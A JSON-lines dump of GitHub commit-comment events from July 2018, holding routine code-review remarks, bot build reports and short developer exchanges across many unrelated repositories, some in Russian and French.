{"id":"7977993374","type":"CommitCommentEvent","actor":{"login":"agronholm"},"repo":{"name":"pypa/wheel"},"payload":{"comment":{"id":29737927,"position":null,"line":null,"path":null,"commit_id":"50e11a0c10ad33eea4e887ea0c1fb6133f0a74d8","created_at":"2018-07-17T16:54:50Z","updated_at":"2018-07-17T16:54:50Z","author_association":"CONTRIBUTOR","body":"I've committed e2b07f25197b35048fb9cd1e4ecfa1e617f78883 to fix this. I also included @wimglenn 's test to prevent any regressions."}},"created_at":"2018-07-17T16:54:50Z"}
{"id":"7977995342","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29737930,"position":23,"line":23,"path":"Lesson_2/5.rb","commit_id":"f4dde1360cd482a65ba8cc7b7f1be5c3364836d8","created_at":"2018-07-17T16:55:13Z","updated_at":"2018-07-17T16:55:13Z","author_association":"NONE","body":"Хорошее решение. Можно сделать красивей используя нативные методы руби.\r\n```\r\n# вот пример используя руби 2.5\r\ndays_in_month.first(month - 1).sum(day)\r\n```"}},"created_at":"2018-07-17T16:55:13Z"}
{"id":"7978000691","type":"CommitCommentEvent","actor":{"login":"mdlpstsci"},"repo":{"name":"mdlpstsci/hstcal"},"payload":{"comment":{"id":29737935,"position":null,"line":null,"path":null,"commit_id":"ac01de955be7a54457dd0731e382b13e06b1c323","created_at":"2018-07-17T16:56:14Z","updated_at":"2018-07-17T16:56:14Z","author_association":"OWNER","body":"@ nmiles : Can you please pull this branch and test the code.  This is the dark correction code which has been modified two work in 2D only.  You may see some differences in values if you are using a different version of gcc.  Also, cfitsio is now a shared library and not statically built into hstcal executables.  The new version of cfitsio needs the curl library.  If you have any issues building this branch, please let me know."}},"created_at":"2018-07-17T16:56:14Z"}
{"id":"7978003870","type":"CommitCommentEvent","actor":{"login":"YuvanManikandan"},"repo":{"name":"YuvanManikandan/Yuvan"},"payload":{"comment":{"id":29737939,"position":null,"line":null,"path":null,"commit_id":"da701fe102bb57fbdc6132c38624bd7906b62eea","created_at":"2018-07-17T16:56:50Z","updated_at":"2018-07-17T16:56:50Z","author_association":"OWNER","body":"make this head"}},"created_at":"2018-07-17T16:56:50Z"}
{"id":"7978004246","type":"CommitCommentEvent","actor":{"login":"mostplsnt1"},"repo":{"name":"mostplsnt1/reentry"},"payload":{"comment":{"id":29737940,"position":1,"line":1,"path":"README.md","commit_id":"7f6b6fb07d7c1d4aec6c7b5de6a3c2aeb25dd221","created_at":"2018-07-17T16:56:54Z","updated_at":"2018-07-17T16:56:54Z","author_association":"OWNER","body":"Not sure what this is"}},"created_at":"2018-07-17T16:56:54Z"}
{"id":"7978010377","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29737949,"position":3,"line":3,"path":"tc_vector/alias_type.h","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T16:58:09Z","updated_at":"2018-07-17T16:58:09Z","author_association":"NONE","body":"unsigned int is not able to equals int32.\r\nI think we should use a explicit name for it."}},"created_at":"2018-07-17T16:58:09Z"}
{"id":"7978011923","type":"CommitCommentEvent","actor":{"login":"evgenpatrushev"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29737951,"position":null,"line":null,"path":null,"commit_id":"3d68583b17f78c9ec4ef1b33575498beef901db8","created_at":"2018-07-17T16:58:26Z","updated_at":"2018-07-17T16:58:26Z","author_association":"COLLABORATOR","body":"Thanks, bro"}},"created_at":"2018-07-17T16:58:26Z"}
{"id":"7978011931","type":"CommitCommentEvent","actor":{"login":"jpylisela"},"repo":{"name":"clickonmedia/interactive-longform-articles"},"payload":{"comment":{"id":29737952,"position":7,"line":12,"path":"templates/article.php","commit_id":"fbf7174b1387fb10891b78cdd4c638f1bd6f6607","created_at":"2018-07-17T16:58:26Z","updated_at":"2018-07-17T16:58:26Z","author_association":"MEMBER","body":"added support for child themes"}},"created_at":"2018-07-17T16:58:26Z"}
{"id":"7978013294","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29737956,"position":null,"line":null,"path":null,"commit_id":"a7db85408a158b2726b04c32acf1c0d5ff59ed9c","created_at":"2018-07-17T16:58:43Z","updated_at":"2018-07-17T16:58:43Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display a list of notes](https://trello.com/c/Pw1sd9f7/5-display-a-list-of-notes)"}},"created_at":"2018-07-17T16:58:43Z"}
{"id":"7978013376","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29737957,"position":null,"line":null,"path":null,"commit_id":"0e732a95ffb1baf4e0cd31238f4816e258f5fc60","created_at":"2018-07-17T16:58:44Z","updated_at":"2018-07-17T16:58:44Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display a list of notes](https://trello.com/c/Pw1sd9f7/5-display-a-list-of-notes)"}},"created_at":"2018-07-17T16:58:44Z"}
{"id":"7978013496","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29737958,"position":null,"line":null,"path":null,"commit_id":"6ec13d6ceadef8b4e8de62840509d7db319a2c3a","created_at":"2018-07-17T16:58:45Z","updated_at":"2018-07-17T16:58:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display a list of notes](https://trello.com/c/Pw1sd9f7/5-display-a-list-of-notes)"}},"created_at":"2018-07-17T16:58:45Z"}
{"id":"7978013566","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29737959,"position":null,"line":null,"path":null,"commit_id":"d524c9426d9c03170a2d30a6d1b4e4567b19c8e1","created_at":"2018-07-17T16:58:46Z","updated_at":"2018-07-17T16:58:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display a list of notes](https://trello.com/c/Pw1sd9f7/5-display-a-list-of-notes)"}},"created_at":"2018-07-17T16:58:46Z"}
{"id":"7978013618","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29737960,"position":null,"line":null,"path":null,"commit_id":"4ef6d94002cb9464c419f1464c110375369538f4","created_at":"2018-07-17T16:58:46Z","updated_at":"2018-07-17T16:58:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display a list of notes](https://trello.com/c/Pw1sd9f7/5-display-a-list-of-notes)"}},"created_at":"2018-07-17T16:58:46Z"}
{"id":"7978014782","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29737964,"position":1,"line":1,"path":"tc_vector/makefile","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T16:59:01Z","updated_at":"2018-07-17T16:59:01Z","author_association":"NONE","body":"Makefile is too heavy. cmake will be better."}},"created_at":"2018-07-17T16:59:01Z"}
{"id":"7978016362","type":"CommitCommentEvent","actor":{"login":"shgupta01"},"repo":{"name":"shgupta01/Test01"},"payload":{"comment":{"id":29737966,"position":null,"line":null,"path":null,"commit_id":"4125debf2498c8230a005dce759aee8d4d23f785","created_at":"2018-07-17T16:59:20Z","updated_at":"2018-07-17T16:59:20Z","author_association":"OWNER","body":"m"}},"created_at":"2018-07-17T16:59:20Z"}
{"id":"7978022664","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29737984,"position":24,"line":24,"path":"tc_vector/pub.h","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:00:28Z","updated_at":"2018-07-17T17:00:28Z","author_association":"NONE","body":"We should not define NULL directly because of many compliers have defined it already."}},"created_at":"2018-07-17T17:00:28Z"}
{"id":"7978027384","type":"CommitCommentEvent","actor":{"login":"maz3max"},"repo":{"name":"pascallanger/DIY-Multiprotocol-TX-Module"},"payload":{"comment":{"id":29737988,"position":null,"line":null,"path":null,"commit_id":"8906c85d067ae8f0b93dfe3dde6483f151914d10","created_at":"2018-07-17T17:01:21Z","updated_at":"2018-07-17T17:01:21Z","author_association":"NONE","body":"This change seems to break AFHDS2A binding for my setup. (er9x on 9XR, 4-in-1 STM32 Multiprotocol)"}},"created_at":"2018-07-17T17:01:21Z"}
{"id":"7978028966","type":"CommitCommentEvent","actor":{"login":"xvitaly"},"repo":{"name":"grishka/libtgvoip"},"payload":{"comment":{"id":29737991,"position":null,"line":null,"path":null,"commit_id":"5380aaba0db661c4a21306817d1bbd46bec52fef","created_at":"2018-07-17T17:01:38Z","updated_at":"2018-07-17T17:01:38Z","author_association":"NONE","body":"OMG. Automake in 2018? Why not cmake/meson?"}},"created_at":"2018-07-17T17:01:38Z"}
{"id":"7978030176","type":"CommitCommentEvent","actor":{"login":"zhuowei"},"repo":{"name":"zhuowei/XNUQEMUScripts"},"payload":{"comment":{"id":29737993,"position":null,"line":null,"path":null,"commit_id":"17c2ed1b255a29f0a18a92b765366a539280dd32","created_at":"2018-07-17T17:01:52Z","updated_at":"2018-07-17T17:01:52Z","author_association":"OWNER","body":"@h3adshotzz `python3 modifydevicetree.py path/to/DeviceTree.d22ap.im4p output.dtb`"}},"created_at":"2018-07-17T17:01:52Z"}
{"id":"7978033826","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29738003,"position":3,"line":3,"path":"Lesson_2/1.rb","commit_id":"25fe0aa6f93cfa1bf40f6c081cdeab59b196ba26","created_at":"2018-07-17T17:02:36Z","updated_at":"2018-07-17T17:02:36Z","author_association":"NONE","body":"Для читаемости длинные хэши лучше записывать так\r\n```\r\nhash = {\r\n  a: 1,\r\n  b: 2,\r\n  c: 3,\r\n  d: 4,\r\n  e: 5\r\n}\r\n```\r\nили вот так:\r\n```\r\nhash = {\r\n  a: 1, b: 2, c: 3,\r\n  d: 4, e: 5\r\n}\r\n```\r\nдаже вот так:\r\n```\r\nhash = { a: 1, b: 2, c: 3,\r\n         d: 4, e: 5 }\r\n```\r\nхотя последний вариант наименее предпочитаемый\r\nименно его ты используешь ))"}},"created_at":"2018-07-17T17:02:36Z"}
{"id":"7978034042","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738005,"position":4,"line":4,"path":"tc_vector/pub.h","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:02:38Z","updated_at":"2018-07-17T17:02:38Z","author_association":"NONE","body":"I don't know why did you use so many macro definitions. A inline function will be better."}},"created_at":"2018-07-17T17:02:38Z"}
{"id":"7978038801","type":"CommitCommentEvent","actor":{"login":"h3adshotzz"},"repo":{"name":"zhuowei/XNUQEMUScripts"},"payload":{"comment":{"id":29738014,"position":null,"line":null,"path":null,"commit_id":"17c2ed1b255a29f0a18a92b765366a539280dd32","created_at":"2018-07-17T17:03:36Z","updated_at":"2018-07-17T17:03:36Z","author_association":"NONE","body":"Tried a different device tree and it worked. There must be some changes between b2 and b3, or that script only works with a specific device tree. "}},"created_at":"2018-07-17T17:03:36Z"}
{"id":"7978039498","type":"CommitCommentEvent","actor":{"login":"grishka"},"repo":{"name":"grishka/libtgvoip"},"payload":{"comment":{"id":29738015,"position":null,"line":null,"path":null,"commit_id":"5380aaba0db661c4a21306817d1bbd46bec52fef","created_at":"2018-07-17T17:03:43Z","updated_at":"2018-07-17T17:03:43Z","author_association":"OWNER","body":"Automake is self-contained, cmake is not."}},"created_at":"2018-07-17T17:03:43Z"}
{"id":"7978040046","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29738016,"position":3,"line":3,"path":"Lesson_2/1.rb","commit_id":"25fe0aa6f93cfa1bf40f6c081cdeab59b196ba26","created_at":"2018-07-17T17:03:49Z","updated_at":"2018-07-17T17:03:49Z","author_association":"NONE","body":"И старайся использовать новую форму записи хэшей.\r\n``` January: 31, > \"January\" => 31 ```"}},"created_at":"2018-07-17T17:03:49Z"}
{"id":"7978040161","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29738017,"position":null,"line":null,"path":null,"commit_id":"6059a9e8a82a6354666154f56d76ab59b18e750a","created_at":"2018-07-17T17:03:50Z","updated_at":"2018-07-17T17:03:50Z","author_association":"COLLABORATOR","body":"- revert"}},"created_at":"2018-07-17T17:03:50Z"}
{"id":"7978046279","type":"CommitCommentEvent","actor":{"login":"vsbogd"},"repo":{"name":"opencog/relex"},"payload":{"comment":{"id":29738029,"position":39,"line":39,"path":"src/java/relex/utils/ResourceUtils.java","commit_id":"47c22bf77e8563d5ee4cef5c516e2e676c335068","created_at":"2018-07-17T17:05:02Z","updated_at":"2018-07-17T17:05:02Z","author_association":"CONTRIBUTOR","body":"Here and below log message is Relex algorithms specific, should be something like \r\n\r\n    logger.info(\"Loading resource from file name: {}, defined by Java property: {}', filePath, propertyName);"}},"created_at":"2018-07-17T17:05:02Z"}
{"id":"7978046541","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738030,"position":11,"line":11,"path":"tc_vector/test_stub.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:05:05Z","updated_at":"2018-07-17T17:05:05Z","author_association":"NONE","body":"FREE(p) have already set NULL to p, and why set NULL to p again?"}},"created_at":"2018-07-17T17:05:05Z"}
{"id":"7978049535","type":"CommitCommentEvent","actor":{"login":"xvitaly"},"repo":{"name":"grishka/libtgvoip"},"payload":{"comment":{"id":29738035,"position":null,"line":null,"path":null,"commit_id":"5380aaba0db661c4a21306817d1bbd46bec52fef","created_at":"2018-07-17T17:05:33Z","updated_at":"2018-07-17T17:05:33Z","author_association":"NONE","body":"Automake is ugly deprecated tool. No one should use it now. Cmake is better."}},"created_at":"2018-07-17T17:05:33Z"}
{"id":"7978050966","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29738037,"position":null,"line":null,"path":null,"commit_id":"8f963145dc3044df2824086f0ddf91041c2019a4","created_at":"2018-07-17T17:05:48Z","updated_at":"2018-07-17T17:05:48Z","author_association":"OWNER","body":"Thanks, I think I understand this better now. I'm under the impression now that search is a necessary part of the main idea and rbeta and depth are stuff I can play with. Would it be interesting to try to further reduce the -4 for the depth or is there something else to it? It looks like just some number to me, but I could be missing something like: is it related to the depth >= 5 condition somehow?"}},"created_at":"2018-07-17T17:05:48Z"}
{"id":"7978052824","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738040,"position":18,"line":18,"path":"tc_vector/test_stub.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:06:07Z","updated_at":"2018-07-17T17:06:07Z","author_association":"NONE","body":"The format is ugly, we should use clang.format to check our code style."}},"created_at":"2018-07-17T17:06:07Z"}
{"id":"7978056155","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29738048,"position":5,"line":5,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/station.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-17T17:06:44Z","updated_at":"2018-07-17T17:06:44Z","author_association":"NONE","body":"1. зачем ты поменял класс? нужно было использовать тот же, что был в предыдущем задании... и тот класс точно не принимал при создании объекта номер... что это за номер? по ТЗ нет никакого номера у станции\r\n2. тот же комментарий, что в модулях - этот код не работает:\r\n```\r\n$ irb -r ./station.rb \r\n2.5.1 :001 > s = Station.new('ku', 123)\r\n => #<Station:0x0000000001c1ace0 @name=\"ku\", @trains=[]> \r\n2.5.1 :002 > Station.all\r\n => Station \r\n2.5.1 :003 >\r\n```\r\nвозвращается класс, а по ТЗ: \"В классе Station (жд станция) создать метод класса all, который возвращает все станции (объекты), созданные на данный момент\"\r\n\r\nметоды очень похожие на этот хорошо разобраны в сркинкасте\r\nдумаю тебе надо пересмотреть его столько раз, сколько понадобится, чтобы понять\r\nэто задачка про метод `all` очень несложная, если ты ее не смог решить, то это значит, что ты не понял материал\r\nнужно разбираться"}},"created_at":"2018-07-17T17:06:44Z"}
{"id":"7978057036","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29738049,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-17T17:06:54Z","updated_at":"2018-07-17T17:06:54Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2319 of 2319 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T17:06:54Z"}
{"id":"7978060163","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"i-shiryaev/thinknetica-ruby"},"payload":{"comment":{"id":29738052,"position":7,"line":7,"path":"Lesson_2/2.rb","commit_id":"25fe0aa6f93cfa1bf40f6c081cdeab59b196ba26","created_at":"2018-07-17T17:07:32Z","updated_at":"2018-07-17T17:07:32Z","author_association":"NONE","body":"Рабочее решение и оно выполняет задачу. Мы в руби стараемся писать так, что-б читалось на английском лучше. Тогда не нужно прогонять в голове все вычисления, что-бы понять что код делает. Вот например\r\n\r\n(10..100).step(5).to_a\r\nМы говорим: \"Дай нам все цифры от 10 до 100 с шагом 5 в виде массива\"."}},"created_at":"2018-07-17T17:07:32Z"}
{"id":"7978060787","type":"CommitCommentEvent","actor":{"login":"pvinis"},"repo":{"name":"crazycodeboy/react-native-splash-screen"},"payload":{"comment":{"id":29738057,"position":null,"line":null,"path":null,"commit_id":"6fbd18613170ebe53bf8063b0728f185f7092444","created_at":"2018-07-17T17:07:40Z","updated_at":"2018-07-17T17:07:40Z","author_association":"NONE","body":"this should be `RNSplashScreen`."}},"created_at":"2018-07-17T17:07:40Z"}
{"id":"7978061070","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29738058,"position":null,"line":null,"path":null,"commit_id":"75e4856e05ec014534111187ab0b97a8859988a0","created_at":"2018-07-17T17:07:43Z","updated_at":"2018-07-17T17:07:43Z","author_association":"COLLABORATOR","body":"Puzzle `1269-a1c2eb54` disappeared from [`src/main/java/com/zerocracy/radars/github/RbRelease.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/radars/github/RbRelease.java), that's why I closed #1366. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-17T17:07:43Z"}
{"id":"7978061129","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738059,"position":36,"line":36,"path":"tc_vector/test_stub.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:07:44Z","updated_at":"2018-07-17T17:07:44Z","author_association":"NONE","body":"We should use google test to test it."}},"created_at":"2018-07-17T17:07:44Z"}
{"id":"7978061458","type":"CommitCommentEvent","actor":{"login":"NothersInGame"},"repo":{"name":"CryptoSharkTeam/SharkCoin"},"payload":{"comment":{"id":29738061,"position":4,"line":204,"path":"src/server.js","commit_id":"e38c2ee318cdd3cd49f90632fd225b37fb4a8976","created_at":"2018-07-17T17:07:48Z","updated_at":"2018-07-17T17:07:48Z","author_association":"CONTRIBUTOR","body":"Transactions works great 👍 "}},"created_at":"2018-07-17T17:07:48Z"}
{"id":"7978062047","type":"CommitCommentEvent","actor":{"login":"pvinis"},"repo":{"name":"crazycodeboy/react-native-splash-screen"},"payload":{"comment":{"id":29738066,"position":null,"line":null,"path":null,"commit_id":"6fbd18613170ebe53bf8063b0728f185f7092444","created_at":"2018-07-17T17:07:54Z","updated_at":"2018-07-17T17:07:54Z","author_association":"NONE","body":"@filipposarzana \r\n"}},"created_at":"2018-07-17T17:07:54Z"}
{"id":"7978066321","type":"CommitCommentEvent","actor":{"login":"quinnmiller1997"},"repo":{"name":"wolfSSL/wolfssl"},"payload":{"comment":{"id":29738078,"position":5,"line":25,"path":"IDE/ROWLEY-CROSSWORKS-ARM/user_settings.h","commit_id":"cd5a05726f6981a49e44013931b4cf9511af1f7a","created_at":"2018-07-17T17:08:47Z","updated_at":"2018-07-17T17:08:47Z","author_association":"CONTRIBUTOR","body":"I am manually defining these within the wolfssl.hzp file using the Jenkins script, so they don't need to be defined here"}},"created_at":"2018-07-17T17:08:47Z"}
{"id":"7978066445","type":"CommitCommentEvent","actor":{"login":"gaetanfavrau"},"repo":{"name":"gaetanfavrau/tableauxBouclesConditions"},"payload":{"comment":{"id":29738079,"position":null,"line":null,"path":null,"commit_id":"4bf9d64be28e1129e7b807fec3aa29a9a41bd1e7","created_at":"2018-07-17T17:08:49Z","updated_at":"2018-07-17T17:08:49Z","author_association":"OWNER","body":"fais gaffe que nous n'avons pas les mêmes numéros de TP -_-\r\ncelui dont tu parles correspond à mon Exercice09"}},"created_at":"2018-07-17T17:08:49Z"}
{"id":"7978067178","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29738081,"position":85,"line":147,"path":"pkgs/stdenv/generic/make-derivation.nix","commit_id":"7f3ca3e21a22fd3101b40cadb86899542dec2e35","created_at":"2018-07-17T17:08:58Z","updated_at":"2018-07-17T17:08:58Z","author_association":"MEMBER","body":"/cc @ericson2314"}},"created_at":"2018-07-17T17:08:58Z"}
{"id":"7978068674","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738083,"position":23,"line":23,"path":"tc_vector/vectorc.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:09:17Z","updated_at":"2018-07-17T17:09:17Z","author_association":"NONE","body":"do while(0) is too ugly."}},"created_at":"2018-07-17T17:09:17Z"}
{"id":"7978070174","type":"CommitCommentEvent","actor":{"login":"amitpatil321"},"repo":{"name":"amitpatil321/mesh_app"},"payload":{"comment":{"id":29738084,"position":44,"line":52,"path":"models/updater.js","commit_id":"feadda53b329ec7defea3893bac6b59489476580","created_at":"2018-07-17T17:09:34Z","updated_at":"2018-07-17T17:09:34Z","author_association":"OWNER","body":"No need to show dialogue box if there are no updates. As this will be shows everytime app opens ? "}},"created_at":"2018-07-17T17:09:34Z"}
{"id":"7978072314","type":"CommitCommentEvent","actor":{"login":"amitpatil321"},"repo":{"name":"amitpatil321/mesh_app"},"payload":{"comment":{"id":29738089,"position":68,"line":75,"path":"models/updater.js","commit_id":"feadda53b329ec7defea3893bac6b59489476580","created_at":"2018-07-17T17:10:02Z","updated_at":"2018-07-17T17:10:02Z","author_association":"OWNER","body":"\"Restart and Update\" => is has to be \"Update and restart\" ?\r\n"}},"created_at":"2018-07-17T17:10:02Z"}
{"id":"7978073169","type":"CommitCommentEvent","actor":{"login":"jlustigy"},"repo":{"name":"rodluger/starry"},"payload":{"comment":{"id":29738093,"position":null,"line":null,"path":null,"commit_id":"e4d32f6fea69ee4d60abd9b965a394fa8b60e4c2","created_at":"2018-07-17T17:10:13Z","updated_at":"2018-07-17T17:10:13Z","author_association":"COLLABORATOR","body":"Ok. Set usetex = False. Still need to perfect the look of the plots.\n\nOn Tue, Jul 17, 2018 at 9:24 AM, Rodrigo Luger <notifications@github.com>\nwrote:\n\n> @jlustigy <https://github.com/jlustigy> usetex isn't going to work on\n> Travis\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/rodluger/starry/commit/e4d32f6fea69ee4d60abd9b965a394fa8b60e4c2#commitcomment-29737565>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIeJIlp0J2Dg2k3IPlKpXlVtA0AVddosks5uHg_QgaJpZM4VTKgf>\n> .\n>\n\n\n\n-- \nJacob Lustig-Yaeger\nAstronomy & Astrobiology Graduate Student\nUniversity of Washington\njlustigy.github.io\n"}},"created_at":"2018-07-17T17:10:13Z"}
{"id":"7978073933","type":"CommitCommentEvent","actor":{"login":"Hains"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29738094,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-17T17:10:21Z","updated_at":"2018-07-17T17:10:21Z","author_association":"MEMBER","body":"Ah..Now i have it.\r\nThanks."}},"created_at":"2018-07-17T17:10:21Z"}
{"id":"7978075553","type":"CommitCommentEvent","actor":{"login":"wangqing1218"},"repo":{"name":"HellsingAshen/vector_c"},"payload":{"comment":{"id":29738098,"position":44,"line":44,"path":"tc_vector/vectorc.c","commit_id":"6d1d7b34ba0ff7a426028d1ece1cbfe222051ad1","created_at":"2018-07-17T17:10:41Z","updated_at":"2018-07-17T17:10:41Z","author_association":"NONE","body":"For any pointer var, we should check it before we use."}},"created_at":"2018-07-17T17:10:41Z"}
{"id":"7978076506","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29738100,"position":1,"line":1,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/train.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-17T17:10:51Z","updated_at":"2018-07-17T17:10:51Z","author_association":"NONE","body":"здесь код тоже не рабочий:\r\n```\r\n$ irb -r ./train.rb \r\n2.5.1 :001 > t = Train.new(123, :cargo)\r\n => #<Train:0x0000000002464540 @number=123, @type=:cargo, @wagons=[], @speed=0> \r\n2.5.1 :002 > Train.train_find(123)\r\nTraceback (most recent call last):\r\n        3: from /home/max/.rvm/rubies/ruby-2.5.1/bin/irb:11:in `<main>'\r\n        2: from (irb):2\r\n        1: from /home/max/ze_learning/THINKNETICA/teaching/ror_full_8/repas/abeuov_dastan/1-Osnovy-Ruby-polnaya-PO/lesson5/train.rb:14:in `train_find'\r\nNoMethodError (undefined method `find' for nil:NilClass)\r\n2.5.1 :003 >\r\n```"}},"created_at":"2018-07-17T17:10:51Z"}
{"id":"7978078732","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29738103,"position":null,"line":null,"path":null,"commit_id":"ba3e0ec011776ecf2fbc96859e50772ee23f42e0","created_at":"2018-07-17T17:11:17Z","updated_at":"2018-07-17T17:11:17Z","author_association":"NONE","body":"This is a clear [0,5] test."}},"created_at":"2018-07-17T17:11:17Z"}
{"id":"7978080418","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/thinknetica"},"payload":{"comment":{"id":29738104,"position":1,"line":1,"path":"1-Osnovy-Ruby-polnaya-PO/lesson5/train.rb","commit_id":"a6fe583efd143cc580fcc26aa93eaedd044e86d3","created_at":"2018-07-17T17:11:39Z","updated_at":"2018-07-17T17:11:39Z","author_association":"NONE","body":"и лучше называть методы согласно ТЗ, т.е. `find`, а не  `train_find`"}},"created_at":"2018-07-17T17:11:39Z"}
{"id":"7978081657","type":"CommitCommentEvent","actor":{"login":"asimrp"},"repo":{"name":"greenplum-db/gpdb"},"payload":{"comment":{"id":29738110,"position":1206,"line":1206,"path":"src/backend/commands/extension.c","commit_id":"ee8daacb503023f9f756922a74fdd2cf8050a736","created_at":"2018-07-17T17:11:53Z","updated_at":"2018-07-17T17:11:53Z","author_association":"MEMBER","body":"Yes please, update the comment to reflect what the code is really doing, if you have more context here."}},"created_at":"2018-07-17T17:11:53Z"}
{"id":"7978081793","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29738112,"position":null,"line":null,"path":null,"commit_id":"ba3e0ec011776ecf2fbc96859e50772ee23f42e0","created_at":"2018-07-17T17:11:55Z","updated_at":"2018-07-17T17:11:55Z","author_association":"OWNER","body":"Ok will re-submit"}},"created_at":"2018-07-17T17:11:55Z"}
{"id":"7978083793","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"f4exb/sdrangel"},"payload":{"comment":{"id":29738114,"position":10,"line":55,"path":"Readme.md","commit_id":"abb335d58865bfcd8d690481f7225fbc182fd7dd","created_at":"2018-07-17T17:12:19Z","updated_at":"2018-07-17T17:12:19Z","author_association":"NONE","body":"`sed -e 's/wihout/without/'`"}},"created_at":"2018-07-17T17:12:19Z"}
